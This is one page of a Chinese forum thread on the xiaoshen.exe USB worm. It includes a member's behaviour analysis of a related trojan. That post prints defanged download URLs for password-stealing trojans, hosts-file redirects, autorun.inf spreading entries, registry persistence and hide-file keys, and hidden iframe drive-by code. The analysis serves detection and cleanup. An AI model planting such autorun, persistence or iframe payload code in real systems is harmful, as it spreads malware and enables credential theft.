123   2  /  3  页   跳转

xiaoshen.exe U盘病毒的处理..

呵呵,我也想看一下这个样本
有哪位朋友可以给我发一下,谢谢。
gototop
 

一开始从网友求助的日志中看到这病毒,我也还以为是个普通的U盘病毒,原来也不简单哦.
学习了
gototop
 

厉害,学习一下,谢谢拉
gototop
 

补一点:
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\
SHOWALL
以上一项需要重新写入


是来自“香港软件王国”的xiaoshao.exe么?2006-11-11 15:02xiaoshao.exe  Trojan-PSW.Win32.Delf.ln

下载:
hxxp://qq.ee28.cn/down/host.txt
设置hosts文件:
127.0.0.1 qq.etsoft.com.cn
61.152.90.31 zt.abcoll.com
下载执行:
hxxp://qq.ee28.cn/down/up.jpg  -->update.exe
hxxp://qq.ee28.cn/down/up1.jpg -->update2.exe Trojan-PSW.Win32.QQRob.jo
hxxp://qq.ee28.cn/down/up2.jpg -->update3.exe Trojan-PSW.Win32.Lmir.beh
hxxp://qq.ee28.cn/down/up3.jpg -->update4.exe
hxxp://qq.ee28.cn/down/up4.jpg -->update5.exe失效
hxxp://qq.ee28.cn/down/up5.jpg -->update9.exe
hxxp://qq.ee28.cn/down/up6.jpg -->update7.exe Trojan-PSW.Win32.Nilage.arz

X:\xiaoshen.exe
X:\autorun.inf
[AutoRun]
Open=xiaoshen.exe
shellexecute=xiaoshen.exe
shell\Auto\command=xiaoshen.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\

SHOWALL
"CheckedValue"=dword:00000001

MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Update=指向Update.exe

下载的木马不在讨论之内:-)

PS:“day day fucking!by kingdom software,co,hk updating....”来自香港软件王国?


-------------------------------------------------------

说明一下undate.exe的问题,其实是下载一个副本程序。

up.jpg  -->update.exe
访问:
<iframe src="hxxp://qq.ee28.cn/htm/" width="0" height="0" scrolling="0" frameborder="0"></iframe>
选择性跳转到hxxp://qq.ee28.cn/htm/s.htm
<iframe src="1234.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
<script src='hxxp://s78.cnzz.com/stat.php?id=291770&web_id=291770' language='JavaScript' charset='gb2312'></script>
访问计数到这里hxxp://qq.ee28.cn/htm/1234.htm
下载:hxxp://qq.ee28.cn/down/down.exe -->mdb.exe 原来这个是副本
但这个档案比xiaoshao.exe少了下载设置hosts的行为:-)

PS:BBS上常见过几分钟后,update.exe开始下载木马的原因可能就是因为这几个跳转吧:-)

discover information:

come on baby!
string:my name is joines

是作者么?


我的分析贴http://hi.baidu.com/killvir/blog/item/fe33033b122784ea14cecb5f.html
gototop
 

的确有些麻烦,谢谢斑竹提醒
gototop
 

学习
gototop
 

学习
gototop
 

厉害,学习!
gototop
 

xiaoshen.exe真是很厉害。我家里的电脑硬盘也是双击打不开,右击盘符时有Auto字样。移动硬盘里的文件受损,很多打不开,不得不把U盘格式化了,损失很重。用瑞星也杀不掉。单位的机子也犯同样的病,用金山在线杀毒显标杀掉了,但显示隐藏文件却改不过来。估计还没杀彻底。
gototop
 

我的都中了 ``当时发了帖子,好象都不知道啊`忽忽`
gototop
 
123   2  /  3  页   跳转
页面顶部
Powered by Discuz!NT